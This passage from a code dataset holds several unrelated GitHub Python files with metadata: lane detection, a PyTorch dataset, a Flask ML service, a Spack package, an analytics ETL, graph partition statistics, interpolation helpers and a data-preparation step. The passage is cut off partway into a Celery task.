words[direction]\n        loc = exits[loc][direction]\n    else:\n        print(\"Yoo mate, you can't go there !\")","repo_name":"YolbarsZiya1997/My_Python_journy","sub_path":"Dictionaries/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"}
+{"seq_id":"14638156095","text":"#Advanced Lane Lines\n#import statements\nimport numpy as np\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\nimport pickle\n\n\n#Calibrate Camera\n\n#prepare object points\nobjp = np.zeros((6*9,3), np.float32)\nobjp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n\n#Arrays to store object points and image points from all the images\nobjpoints = [] #3d points in real world space\nimgpoints = [] # 2d points in image plane\n\n#Make a list of calibration images\nimages = glob.glob('camera_cal/calibration*.jpg')\n\n#Step through the list and search for chessboard corners\nfor idx, fname in enumerate(images):\n    img = cv2.imread(fname)\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n    #find corners\n    ret, corners = cv2.findChessboardCorners(gray, (9,6), None)\n\n    #If found, add object points, image points\n    if ret == True:\n        objpoints.append(objp)\n        imgpoints.append(corners)\n\n        #Draw and display the corners\n        cv2.drawChessboardCorners(img, (9,6), corners, ret)\n        cv2.imshow('img', img)\n        cv2.waitKey(500)\n\ncv2.destroyAllWindows()\n\n\ndef undistort(img, objpoints, imgpoints):\n    '''\n    undistorts an image\n    input: image, list of objpoints, and list of imgpoints\n    output: undistorted image\n    '''\n    img_size = (img.shape[1], img.shape[0])\n    #print(img_size)\n\n    #Do camera calibration give obj points and img points\n    ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size, None, None)\n    dst = cv2.undistort(img, mtx, dist, None, mtx)\n\n    #visualize undistortion\n    #visualizeUndistort(img, dst)\n    #return undistorted image\n    return dst\n\ndef visualizeUndistort(img, dst):\n    f, (ax1, ax2) = plt.subplots(1,2, figsize = (20, 10))\n    ax1.imshow(img)\n    ax1.set_title('Original Image')\n    ax2.imshow(dst)\n    ax2.set_title('Undistorted Image')\n\n\n\n\n#Transform to birds eye view\ndef perspectiveTransform(img):\n    '''\n    updates a photo to make it bird's eye view\n    input: Original image\n    output: Transformed image\n    '''\n    offset = 100\n    img_size = (img.shape[1], img.shape[0])\n\n    #find source and destination points\n    #####################################################\n    src = np.float32([]) # find points from my mask?\n    #####################################################\n    dst = np.float32([[offset, offset], [img_size[0] - offset, offset], [img_size[0] - offset, img_size[1] - offset], [offset, img_size[1] - offset]]) \n    #compute perspective transform, M\n    M = cv2.getPerspectiveTransform(src, dst)\n    #warp image\n    warp = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n    return warp\n    \n\n#Sobel x plus S_gradient, put on mask\ndef thresholding(img, sobel_t_min = 20, sobel_t_max = 100, s_t_min = 170, s_t_max = 255):\n    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n    sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)\n    abs_sobelx = np.absolute(sobelx)\n    scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))\n\n    sxbinary = np.zeros_like(scaled_sobel)\n    sxbinary[(scaled_sobel >= sobel_t_min) & (scaled_sobel <= sobel_t_max)] = 1\n\n    hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n    s_channel = hls[:,:,2]\n    s_binary = np.zeros_like(s_channel)\n    s_binary[(s_channel >= s_t_min) & (s_channel <= s_t_max)] = 1\n\n    #stack both to see the individual contributions. Green for Sobel, Blue for Saturation (HLS)\n    color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255\n\n    #combine the two thresholds\n    combined_binary = np.zeros_like(sxbinary)\n    combined_binary[(s_binary ==1) | (sxbinary ==1)] =1\n\n    return combined_binary\n    \n    \n#Training for lines\n\n#Creating polyfit of left and right lanes\n\n#Calculating radius\n\n#Drawing line on image\n\n#Filling in area on image\n\n\n#work on lines and make sure that everything is set! compile this stuff and work on it on tuesday\n#try to find out how to plot out with matplot lib and idle\n#find out why my warp inverse doesnt work\n#find out how to install mpeg reader on work laptop to make it run\n","repo_name":"seanjahaupan/AdvancedLaneFinding","sub_path":"Project4.py","file_name":"Project4.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
+{"seq_id":"765218155","text":"import os\nfrom torch.utils.data import Dataset\nimport torch\nimport random\nimport math\nfrom pathlib import Path\nimport json\nfrom torchvision import transforms\n\n\nclass ArtifiscoDataset(Dataset):\n    def __init__(self, root, train_val_split=0.8, train=False):\n        # with open(os.path.join(root, 'metadata.json')) as fp:\n        #     metadata = json.load(fp)\n\n        self.files = list(Path(root).rglob('*.pth'))\n        shuffle = random.Random(42).shuffle  # Make sure to have reproducible shuffling\n        shuffle(self.files)\n\n        split_point = math.floor(len(self.files) * train_val_split)\n        if train:\n            self.files = self.files[:split_point]\n        else:\n            self.files = self.files[split_point:]\n\n        # self.image_transforms = transforms.Compose([\n        #     transforms.ToPILImage(),\n        #     transforms.Resize((metadata['width_images'], metadata['height_images'])),\n        #     transforms.ToTensor(),\n        #     transforms.Normalize(metadata['mean_images'], metadata['std_images'])\n        # ])\n        #\n        # self.spectrum_transforms = transforms.Normalize(metadata['mean_spectrums'], metadata['std_spectrums'])\n\n    def __getitem__(self, index):\n        data = torch.load(self.files[index])\n\n        data['image'] = torch.stack([\n            data['image'],\n            data['image'],\n            data['image']\n        ], dim=0)\n\n        data['spectrum'] = torch.stack([\n            data['spectrum'],\n            data['spectrum'],\n            data['spectrum']\n        ], dim=0)\n\n        # data['image'] = self.image_transforms(data['image'])\n        # 
data['spectrum'] = self.spectrum_transforms(data['spectrum'])\n return data\n\n def __len__(self):\n return len(self.files)\n","repo_name":"cemfi/artifisco","sub_path":"find_measure_in_audio/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12523622498","text":"from flask import Flask, request, jsonify\nfrom waitress import serve\nimport pandas as pd\nimport logging\nimport os\n\nfrom model_building.predictor import Predictor\nimport sequence_data_processing\n\n\n# ----------------------------------------------------------------------------\n# global definitions\n# ----------------------------------------------------------------------------\napp = Flask(__name__)\n\n# online path\ntrain_path = \"/amllibrary/train\"\npredict_path = \"/amllibrary/predict\"\n\n# exit codes\nNOT_FOUND = 404\nPOST_SUCCESS = 201\n\n# error messages\nerror_msg = {\n 404: \"ERROR: page not found\",\n 414: \"ERROR: missing mandatory input `configuration_file`\",\n 424: \"ERROR: missing mandatory input `regressor`\",\n 434: \"ERROR: either `config_file` or `df` must be provided\",\n 444: \"ERROR: both `config_file` and `df` provided --> ambiguous call\",\n 454: \"ERROR: aMLLibrary called `sys.exit`\"\n}\n\n# set basic logging level\nlogging.basicConfig(level=logging.INFO)\n\n\n# ----------------------------------------------------------------------------\n# train service\n# ----------------------------------------------------------------------------\n@app.route(train_path, methods=[\"POST\"])\ndef train():\n \"\"\"\n Starts training service\n\n Returns\n -------\n Message and key denoting the training outcome (success or failure)\n \"\"\"\n # get all data\n data = request.get_json()\n \n # check existence of mandatory fields:\n KEY_ERROR = 0\n if \"configuration_file\" not in data.keys():\n KEY_ERROR = 10\n else:\n # extract configuration parameters\n configuration_file = data[\"configuration_file\"]\n debug = data.get(\"debug\", False)\n output = data.get(\"output\", \"output\")\n j = data.get(\"j\", 1)\n details = data.get(\"details\", False)\n keep_temp = data.get(\"keep_temp\", False)\n\n # set logging level for debugging (if required)\n if debug:\n logging.getLogger().setLevel(logging.DEBUG)\n\n try:\n # train\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n processor = sequence_data_processing.SequenceDataProcessing(\n configuration_file, \n debug=debug, \n output=output, \n j=j, \n details=details, \n keep_temp=keep_temp\n )\n processor.process()\n\n # define output\n output = (\"DONE\", POST_SUCCESS)\n \n # define appropriate key error if the training module fails\n except SystemExit:\n KEY_ERROR = 50\n \n # if any key error is defined, return original data and error code\n if KEY_ERROR > 0:\n output = (error_msg[NOT_FOUND + KEY_ERROR], NOT_FOUND + KEY_ERROR)\n \n return jsonify(output[0]), output[1]\n\n\n\n# ----------------------------------------------------------------------------\n# predict service\n# ----------------------------------------------------------------------------\n@app.route(predict_path, methods=[\"POST\"])\ndef predict():\n \"\"\"\n Starts predict service\n\n Returns\n -------\n Message and key denoting the predict outcome (success or failure)\n The message contains the list of predicted values if the prediction is \n done on a dataframe instead of a file\n \"\"\"\n # get all data\n data = request.get_json()\n \n # check existence of mandatory 
fields:\n KEY_ERROR = 0\n if \"regressor\" not in data.keys():\n KEY_ERROR = 20\n elif (\"config_file\" not in data.keys()) and (\"df\" not in data.keys()):\n KEY_ERROR = 30\n elif (\"config_file\" in data.keys()) and (\"df\" in data.keys()):\n KEY_ERROR = 40\n else:\n # get configuration parameters\n regressor_file = data[\"regressor\"]\n config_file = data.get(\"config_file\", None)\n output_folder = data.get(\"output\", \"output_predict\")\n debug = data.get(\"debug\", False)\n mape_to_file = data.get(\"mape_to_file\", False)\n df = data.get(\"df\", None)\n\n # set logging level for debugging (if required)\n if debug:\n logging.getLogger().setLevel(logging.DEBUG)\n \n try:\n # initialize predictor\n predictor_obj = Predictor(\n regressor_file=regressor_file, \n output_folder=output_folder, \n debug=debug\n )\n\n # if configuration file is provided, perform prediction from file\n if \"config_file\" in data.keys():\n predictor_obj.predict(\n config_file=config_file, \n mape_to_file=mape_to_file\n )\n result = \"DONE\"\n else:\n # otherwise, perform prediction from dataframe\n yy = predictor_obj.predict_from_df(\n xx=pd.DataFrame(df),\n regressor_file=regressor_file\n )\n result = str(yy)\n \n # define output \n output = (result, POST_SUCCESS)\n \n # define appropriate key error if the training module fails\n except SystemExit:\n KEY_ERROR = 50\n \n # if any key error is defined, return original data and error code\n if KEY_ERROR > 0:\n output = (error_msg[NOT_FOUND + KEY_ERROR], NOT_FOUND + KEY_ERROR)\n \n return jsonify(output[0]), output[1]\n\n\n\n# ----------------------------------------------------------------------------\n# start\n# ----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n # app.run(debug=True, host=\"0.0.0.0\", port=8888)\n serve(app, host=\"0.0.0.0\", port=8888)\n","repo_name":"aMLLibrary/aMLLibrary","sub_path":"web_service.py","file_name":"web_service.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"1923629074","text":"from spack.package import *\n\n\nclass Xclipboard(AutotoolsPackage, XorgPackage):\n \"\"\"xclipboard is used to collect and display text selections that are\n sent to the CLIPBOARD by other clients. It is typically used to save\n CLIPBOARD selections for later use. 
It stores each CLIPBOARD\n selection as a separate string, each of which can be selected.\"\"\"\n\n homepage = \"https://cgit.freedesktop.org/xorg/app/xclipboard\"\n xorg_mirror_path = \"app/xclipboard-1.1.3.tar.gz\"\n\n version(\"1.1.4\", sha256=\"c40cb97f6c8597ba74a3de5c188d4429f686e4d395b85dac0ec8c7311bdf3d10\")\n version(\"1.1.3\", sha256=\"a8c335cf166cbb27ff86569503db7e639f85741ad199bfb3ba45dd0cfda3da7f\")\n\n depends_on(\"libxaw\")\n depends_on(\"libxmu\")\n depends_on(\"libxt@1.1:\")\n depends_on(\"libx11\")\n depends_on(\"libxkbfile\")\n\n depends_on(\"xproto@7.0.17:\")\n depends_on(\"pkgconfig\", type=\"build\")\n depends_on(\"util-macros\", type=\"build\")\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/xclipboard/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"23337909303","text":"from requester import Requester\nfrom dbconnector import Connector\nimport json\nimport datetime as dt\n\n\nclass Etl:\n\tdef __init__(self):\n\t\tself.req = Requester()\n\t\tself.connector = Connector()\n\n\tdef get_report_dictionary(self, report):\n\t\tcolumnHeader = report.get('columnHeader', {})\n\t\treturn {\n\t\t\t'columnHeader': columnHeader,\n\t\t\t'dimensionHeaders': columnHeader.get('dimensions', []),\n\t\t\t'metricHeaders': columnHeader.get('metricHeader', {}).get('metricHeaderEntries', []),\n\t\t\t'rows': report.get('data', {}).get('rows', [])\n\t\t}\n\n\tdef formatted_output(self, input):\n\t\tstats = []\n\t\tfor report in input.get('reports', []):\n\t\t\trdictionary = self.get_report_dictionary(report)\n\t\t\tfor row in rdictionary['rows']:\n\t\t\t\tstat = {}\n\t\t\t\tdimensions = row.get('dimensions', [])\n\t\t\t\tdateRangeValues = row.get('metrics', [])\n\t\t\t\tfor header, dimension in zip(rdictionary['dimensionHeaders'], dimensions):\n\t\t\t\t\thd = header.replace('ga:', '')\n\t\t\t\t\tif(hd == 'date'):\n\t\t\t\t\t\tdimension = dt.datetime.strptime(dimension, '%Y%m%d').strftime('%Y-%m-%d')\n\t\t\t\t\tstat[hd] = dimension\n\t\t\t\tfor i, values in enumerate(dateRangeValues):\n\t\t\t\t\tfor metricHeader, value in zip(rdictionary['metricHeaders'], values.get('values') ):\n\t\t\t\t\t\tstat[metricHeader.get('name').replace('ga:', '')] = value\n\t\t\t\tstats.append(stat) \n\t\treturn stats\n\n\tdef retrieve_all_stats(self, destroy_after=True):\n\t\tself.retrieve_hostname_stats(False)\n\t\tself.retrieve_city_stats(False)\n\t\tself.retrieve_region_stats(False)\n\t\tself.retrieve_devices_stats(False)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\n\tdef retrieve_hostname_stats(self, destroy_after=True):\n\t\tprint('getting hostname stats')\n\t\treport = self.req.get_hostname_stats( '2017-01-01' )\n\t\tstats = self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_hostname_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\tdef retrieve_city_stats(self, destroy_after=True):\n\t\tprint('getting city stats')\n\t\treport = self.req.get_city_stats( '2017-01-01' )\n\t\tstats = self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_city_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\tdef retrieve_region_stats(self, destroy_after=True):\n\t\tprint('getting region stats')\n\t\treport = self.req.get_region_stats( '2017-01-01' )\n\t\tstats = 
self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_region_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\n\tdef retrieve_devices_stats(self, destroy_after=True):\n\t\tprint('getting devices stats')\n\t\treport = self.req.get_devices_stats( '2017-01-01' )\n\t\tstats = self.formatted_output(report)\n\t\tfor row in stats:\n\t\t\tself.connector.insert_ignore(\"analytics_device_stats\",row)\n\t\tif (destroy_after):\n\t\t\tself.connector.serv_destory()\n\ndef main():\n\tetl = Etl()\n\tetl.retrieve_all_stats()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"scissorhands/pynal","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27403951986","text":"import multiprocessing as mp\nfrom networkx.generators.geometric import random_geometric_graph as rgg\nfrom networkx import adjacency_matrix as toMatrix\nimport sparse_specializer as sp\nimport numpy as np\n\ndef compare(trials,args=[],func=rgg):\n #this is creating a list of the sizes of equitable partitions that appear when the algorithm is run trials number of times.\n #exists because multiprocessing library requires a callable function to parallelize.\n if len(args)==0:\n raise ValueError('must contain required arguments')\n stuff = []\n for i in range(trials):\n stuff=stuff+[len(j) for j in sp.DirectedGraph(toMatrix(func(*args))).coloring().values()]\n return stuff\ndef probs(trials,engines=4,args=[],func=rgg):\n #This is the parallelized version.\n #trials is the number of graphs to create.\n #engines is the number of threads to use in parallelization\n #args is a list of the arguments for the function that is passed in. ORDER MATTERS\n pool = mp.Pool(engines)\n stuff = pool.apply(compare,args=[trials,args,func])\n return stuff\ndef compare_radius(r,n,trials):\n #returns a list of all communities generated in int(trials) trials. 
This is specifically for random geometric, and will likely be phased out\n stuff = []\n for i in range(trials):\n stuff = stuff + [len(j) for j in sp.DirectedGraph(toMatrix(rgg(n,r))).coloring().values()]\n return stuff\n\ndef prob_distr(r,n,trials,threads):\n #returns an empirical probability distribution of the likelihood of a community appearing\n #in a geometric graph with radius r and number of nodes n in trials number of trials.\n pool=mp.Pool(threads)\n stuff = pool.apply(compare_radius,args=[r,n,trials])\n vals,counts = np.unique(stuff,return_counts=True)\n total = 0\n distr=np.zeros(n)\n for i,j in zip(vals,counts):\n total+=i*j\n distr[i-1]=i*j\n return distr/total\n\n#In Progress\n#Scmirnov Distance\ndef Scmirnov(dist1,dist2):\n #these are both distributions with the same number of nodes\n #computes the Scmirnov distance between the distributions\n assert len(dist1) == len(dist2)\n return np.max(np.abs(np.array(dist1)-np.array(dist2)))\n\n#In Progress\n#set up \"L2\" distance between probability distributions by making community size x and probability y\ndef L2dist(dist1,dist2):\n assert len(dist1) == len(dist2)\n #first turn each distribution into a collection of x,y points\n dist1 = [(i,dist1[i]) for i in range(len(dist1))]\n dist2 = [(i,dist2[i]) for i in range(len(dist2))]\n dist1 = np.array(dist1)\n dist2 = np.array(dist2)\n #for each point in dist1, make a list of the distances between it and each point in dist2\n distances = np.array([[np.linalg.norm(i-j) for i in dist2] for j in dist1])\n return np.max(np.min(distances[distances > 0]))\n\n#making a kernel density estimator for a distribution.\n#an implementation using raw graphs\nfrom sklearn.neighbors import KernelDensity as KDE\n\ndef rawKDE(n,r,iterations,engines,kernel='gaussian',bandwidth=.3):\n #returns a KernelDensity object fitted to an average distribution style of equitable partitions.\n pool = mp.Pool(engines)\n stuff = pool.apply(compare_radius,args=[r,n,iterations])\n return KDE(kernel=kernel,bandwidth=bandwidth).fit(np.array(stuff).reshape(-1,1))\ndef toKDE(data,kernel='gaussian',bandwidth=.3):\n #data is a list of community sizes\n return KDE(kernel=kernel,bandwidth=bandwidth).fit(np.array(data).reshape(-1,1))\n\n\n\nfrom matplotlib import pyplot as plt\n\n\n#figure out how to plot a distribution using the kernel density estimator.\ndef plot(obj,n,res=None,label=None):\n #obj should be a KernelDensity object, pretrained on some data.\n #n is the number of nodes in the graph that the estimator was trained on, preferably, however, it is merely the x-axis.\n #res is the number of points to evaluate the pdf at.\n if res is None:\n res=n\n domain = np.linspace(0,n,res,endpoint=True)[:,np.newaxis]\n logs = obj.score_samples(domain)\n if label is None:\n plt.plot(domain,np.exp(logs))\n else:\n plt.plot(domain,np.exp(logs),label=label)\n return\n","repo_name":"EthanMWalker/NetworkSpecialization","sub_path":"probdist.py","file_name":"probdist.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16271785030","text":"import threading\r\nimport time\r\nfrom logs import *\r\n\r\nclass Partida:\r\n def __init__(self,capacidad,duracion,jugadores_cola,id_game):\r\n self.id_game = id_game\r\n self.partida_log = PartidaLog(obtener_juego(id_game).replace(\" \",\"\") + \".txt\")\r\n self.jugador_host = -1\r\n self.capacidad = capacidad\r\n self.duracion = duracion\r\n self.jugadores_cola = jugadores_cola\r\n self.threadLock 
= threading.Lock()\r\n self.statusLock = threading.Lock()\r\n self.queueSemaphore = threading.Semaphore(jugadores_cola)\r\n self.en_partida = list()\r\n self.cola = list()\r\n self.status = True\r\n\r\n def in_game(self,jugador,pos):\r\n self.statusLock.acquire()\r\n if (self.jugador_host == -1 and len(self.en_partida) == self.capacidad) or (self.jugador_host == -1 and len(self.cola) == 0 and len(self.en_partida[pos][2]) == 0):\r\n self.jugador_host = jugador\r\n self.statusLock.release()\r\n if self.jugador_host == jugador:\r\n print(\"Inicio de partida\")\r\n time.sleep(self.duracion)\r\n for j,s,_ in self.en_partida:\r\n if j != self.jugador_host:\r\n s.release()\r\n self.jugador_host = -1\r\n self.threadLock.acquire()\r\n self.en_partida = list()\r\n if len(self.cola) > 0:\r\n self.cola[0][1].release()\r\n self.threadLock.release()\r\n else:\r\n self.en_partida[pos][1].acquire()\r\n salida_log.registrar(jugador,salida_log.obtener_tiempo())\r\n print(jugador,\"Saliendo\")\r\n\r\n def entrar_en_cola(self,jugador,queue,entrada):\r\n\r\n print(jugador,\"Esperando que exista espacio en cola\")\r\n self.queueSemaphore.acquire()\r\n queue.pop(0)\r\n lobby_log.registrar(jugador,self.id_game,entrada,lobby_log.obtener_tiempo())\r\n if len(queue) > 0:\r\n queue[0][1].release()\r\n self.status = True\r\n else:\r\n self.status = False\r\n\r\n self.threadLock.acquire()\r\n semaphore = threading.Semaphore(0)\r\n self.cola.append((jugador,semaphore,queue))\r\n entrada = self.partida_log.obtener_tiempo()\r\n print(jugador,\"Ingresando a la cola\")\r\n while len(self.en_partida) >= self.capacidad or self.cola[0][0] != jugador:\r\n self.threadLock.release()\r\n semaphore.acquire()\r\n self.threadLock.acquire()\r\n self.cola.pop(0)\r\n pos = len(self.en_partida)\r\n self.en_partida.append((jugador,semaphore,queue))\r\n self.partida_log.registrar(jugador,entrada,self.partida_log.obtener_tiempo())\r\n if len(self.cola) > 0:\r\n self.cola[0][1].release()\r\n self.status = True\r\n self.threadLock.release()\r\n self.queueSemaphore.release()\r\n print(jugador,\"Esperando que se inicie la partida\")\r\n self.in_game(jugador,pos)\r\n\r\n\r\nEstandar = Partida(15,7,7,1)\r\nVersus = Partida(2,3,4,2)\r\nRapida = Partida(10,6,8,3)\r\nNavidad = Partida(12,5,10,4)","repo_name":"CharlesLakes/lab-so","sub_path":"tarea4/partida.py","file_name":"partida.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24854041649","text":"'''\n\n 1) Avoiding ORM\n\n 2) Database request templates for writing and reading\n\n'''\n\n\nclass ControlDb:\n def __init__(self, table_name='rate'):\n self.table = table_name\n self.upload_template = \"\"\"insert into {table_}\n values{vals}\n ON CONFLICT (cur1, cur2)\n DO UPDATE SET\n uploadtime = EXCLUDED.uploadtime,\n rate = EXCLUDED.rate;\"\"\"\n\n self.request_tempelate = \"\"\"select * from {table_};\"\"\"\n\n def upsert_request(self, data):\n v = ([\"('{}', '{}', {}, to_timestamp({}))\".format(*i) for i in data])\n v = ','.join(v)\n return self.upload_template.format(table_=self.table, vals=v)\n\n def select_request(self):\n return self.request_tempelate.format(table_=self.table)\n","repo_name":"vbaryshev4/faster_python","sub_path":"homework/11/Provider/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"41623967018","text":"import pandas as 
pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef split (dataset, training_ratio):\r\n n = len (dataset) # Size of dataset\r\n r = int (training_ratio * n) # No. of training examples\r\n np.random.shuffle (dataset) # Shuffling the dataset\r\n return dataset[:r,:], dataset[r:,:]\r\n\r\ndef train (train_data):\r\n n = len (train_data) # Size of training dataset\r\n # Split the data and flatten the numpy arrays\r\n x, y = np.ravel (train_data[:,:1]), np.ravel (train_data[:,1:])\r\n # Plot the training dataset\r\n plt.scatter (x, y, color = \"blue\", s = 1, label = 'Train data')\r\n # Calculate mean, variance and covariance\r\n mean_x = np.sum(x) / n\r\n mean_y = np.sum(y) / n\r\n covariance_x_y = (1/n) * np.sum(x*y) - mean_x * mean_y \r\n var_x = (1/n) * np.sum(x*x) - mean_x * mean_x \r\n # y(bar) = a * x(bar) + b\r\n a = covariance_x_y / var_x\r\n b = mean_y - a * mean_x\r\n return a, b\r\n \r\ndef test (test_data, coefficients):\r\n n = len (test_data) # Size of testing dataset\r\n a, b = coefficients[0], coefficients[1]\r\n # Split the data and flatten the numpy arrays\r\n x, y = np.ravel (test_data[:,:1]), np.ravel (test_data[:,1:])\r\n # Plot the testing dataset\r\n plt.scatter (x, y, color = \"red\", s = 1, label = 'Test data')\r\n # Display the test results\r\n p = 10; # No. of decimal places\r\n print (\"X\\t\\tY\\t\\tY(Predicted)\");\r\n print (\"______________________________________________\");\r\n for i in range (n):\r\n y_pred = a * x[i] + b\r\n print (str(round(x[i],p)) + \"\\t\" + str(round(y[i],p)) + \"\\t\" + str(round(y_pred,p)))\r\n print (\"______________________________________________\");\r\n \r\ndef plot_regression_line (dataset, coefficients):\r\n a, b = coefficients[0], coefficients[1]\r\n # Split the data and flatten the numpy arrays\r\n x, y = np.ravel (dataset[:,:1]), np.ravel (dataset[:,1:])\r\n y_pred = a * x + b\r\n # Plot the regression line\r\n plt.plot (x, y_pred, color = \"green\")\r\n plt.xlabel ('X')\r\n plt.ylabel ('Y')\r\n plt.legend (loc = 'lower right')\r\n plt.title (\"Linear Regression Model\")\r\n plt.savefig ('output_plot.png', dpi=400)\r\n \r\ndef main ():\r\n # Read the csv file\r\n dataset = pd.read_csv ('Linear_Regression_Data_1D.csv').to_numpy()\r\n # Split the data set\r\n train_data, test_data = split (dataset, 0.8)\r\n # Train the data\r\n coefficients = train (train_data)\r\n # Test the data\r\n test (test_data, coefficients)\r\n # Plot the data\r\n plot_regression_line (dataset, coefficients)\r\n \r\nmain()","repo_name":"rv619/Machine-Learning","sub_path":"1D_Linear_Regression/linear_reg_1D.py","file_name":"linear_reg_1D.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"70367586156","text":"from math import sqrt\nfrom typing import Union, Tuple, List\n\nNumber = Union[int, float]\nPoint = Tuple[Number, Number]\n\n\ndef clamp(val, minimum, maximum):\n return max(min(maximum, val), minimum)\n\n\ndef distance(point_1: Point, point_2: Point) -> float:\n x1, y1 = point_1\n x2, y2 = point_2\n\n return sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n\n\ndef distances(points: List[Point]) -> List[float]:\n paired_points = zip(points, points[1:] + points[:1])\n return [distance(*pair) for pair in paired_points]\n\n\ndef lerp(x1: Number, x2: Number, w: Number) -> Number:\n return w * x1 + (1 - w) * x2\n\n\ndef lerp2D(p1: Point, p2: Point, w: Number) -> Point:\n x1, y1 = p1\n x2, y2 = p2\n return (lerp(x1, x2, w), lerp(y1, y2, 
w))\n\n\ndef incomplete_perimeter_points(points: List[Point], weight: float) -> List[Point]:\n all_distances = distances(points)\n total_perimeter = sum(all_distances)\n\n covered_distance = weight * total_perimeter\n final_points = [points[0]]\n\n previous_point = points[0]\n for point, distance in zip(points[1:] + points[:1], all_distances):\n covered_distance -= distance\n if covered_distance >= 0:\n final_points.append(point)\n previous_point = point\n continue\n weight = abs(covered_distance / distance)\n final_points.append(lerp2D(previous_point, point, weight))\n break\n\n return final_points\n","repo_name":"b34nst4lk/tetris.py","sub_path":"utils/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12523463788","text":"import sys\nimport warnings\n\nimport numpy as np\n\nimport data_preparation.data_preparation\n\n\nclass Logarithm(data_preparation.data_preparation.DataPreparation):\n \"\"\"\n Step adds new columns obtained by taking the natural logarithm of values in existing columns\n\n The set of columns to be transformed is listed in option \"log\" of \"DataPreparation\" section in campaign configuration.\n The name of the new columns is the name of the old columns with \"log_\" as prefix\n Original columns remain part of the input dataset\n\n Methods\n -------\n get_name()\n Return the name of this step\n\n process()\n Take logarithms of the specified columns\n \"\"\"\n\n def get_name(self):\n \"\"\"\n Return \"Logarithm\"\n\n Returns\n string\n The name of this step\n \"\"\"\n return \"Logarithm\"\n\n def process(self, inputs):\n \"\"\"\n Main method of the class which performs the actual computation\n\n Parameters\n ----------\n inputs: RegressionInputs\n The data to be analyzed\n \"\"\"\n warnings.filterwarnings('error')\n np.seterr(all='warn')\n outputs = inputs\n\n to_be_logd_list = self._campaign_configuration['DataPreparation']['log']\n if to_be_logd_list == \"[*]\":\n to_be_logd_list = inputs.x_columns.copy()\n\n for column in to_be_logd_list:\n if inputs.data[column].dtype == bool:\n self._logger.debug(\"Skipping logarithm of boolean-valued column: %s\", column)\n continue\n if inputs.data[column].dtype == object:\n self._logger.error(\"Trying to take logarithm of a string column: %s\", column)\n sys.exit(-1)\n if any(inputs.data[column] <= 0):\n self._logger.error(\"Trying to take logarithm of non-positive value in column %s\", column)\n sys.exit(-1)\n try:\n new_column = np.log(inputs.data[column])\n except Warning:\n self._logger.error(\"Error in computing logarithm of %s\", column)\n sys.exit(1)\n new_feature_name = 'log_' + column\n outputs.data[new_feature_name] = new_column\n outputs.x_columns.append(new_feature_name)\n\n return outputs\n","repo_name":"aMLLibrary/aMLLibrary","sub_path":"data_preparation/logarithm.py","file_name":"logarithm.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"21592104684","text":"from celery import shared_task\nfrom bson import ObjectId\nfrom database.database import connection\nimport json\nfrom datetime import datetime, timedelta\nimport requests\nimport requests\nfrom bson import json_util\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='User:Create New Conversation.')\ndef savingChat(self,data):\n 
